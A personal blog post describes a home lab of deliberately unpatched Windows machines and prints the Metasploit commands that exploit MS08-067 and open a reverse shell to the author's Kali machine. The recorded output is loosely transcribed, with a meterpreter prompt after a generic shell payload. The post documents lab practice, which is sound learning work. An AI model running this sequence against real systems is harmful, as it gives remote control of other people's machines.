Clubbing Baby Seals

So to get some practice I’ve built a lab of obscenely vulnerable Windows client machines.  While this doesn’t really represent any kind of real world situation it’s been a good place for me to play around and test things while actually seeing some results. Though it does kind of feel like clubbing a baby seal at times.

  • XP SP3 or unpatched 7.
  • Adobe Reader 8.0
  • Adobe Air
  • Adobe Flash
  • Chrome 22.0.1229.0
  • Firefox 17.0
  • Java JRE 7 update 2
  • Realplayer
  • Shockwave

The process goes like this. Install OS, join domain, install all the software, configure the profile, snapshot the VM, ready for use!

The first tests I’ve been doing have all been MITM based browser attacks, but today I felt like being a bit more direct.

I initially tried using exploit/windows/dcerpc/ms03_026_dcom.  The first run indicated the port wasn’t open. Which made sense because I never opened that port on the target. So I created a file share to “prime the pump”.  Still no dice.

Next up was exploit/windows/smb/ms08_067_netapi. This one worked, and I got a shell. I’m documenting the actual text below so I have it for later.

root@KALI:~# msfconsole
msf > use exploit/windows/smb/ms08_067_netapi
msf exploit(ms08_067_netapi) > set RHOST (target)
msf exploit(ms08_067_netapi) > set PAYLOAD generic/shell_reverse_tcp
msf exploit(ms08_067_netapi) > set LHOST (Kali)
msf exploit(ms08_067_netapi) > exploit
meterpreter > (Success!)

I’ll probably mess around more later today.

Leave a Reply

Your email address will not be published. Required fields are marked *